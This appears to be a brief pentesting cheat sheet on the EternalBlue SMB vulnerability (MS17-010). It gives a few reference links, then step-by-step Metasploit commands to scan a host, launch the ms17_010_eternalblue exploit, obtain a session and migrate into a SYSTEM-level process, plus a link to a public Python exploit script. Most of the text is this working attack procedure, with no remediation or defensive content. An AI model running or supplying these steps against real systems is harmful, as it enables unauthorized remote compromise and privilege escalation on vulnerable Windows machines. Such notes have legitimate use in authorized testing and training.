It’s basically a biffer overflow vulnerability in the SMB module.
References
Expand…
https://technet.microsoft.com/en-us/library/security/ms17-010.aspx https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
📕 RTFM
nmap --script vuln <ip>
msfconsole
search eternalblue
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <targets IP>
exploit
# you will get a session if the system is vulnerable
ps # list processes, choose the one with System permissions if your permissions are not enough
migrate <pid> # try different PIDs
Python exploit script - https://github.com/3ndG4me/AutoBlue-MS17-010/blob/master/eternalblue_exploit10.py.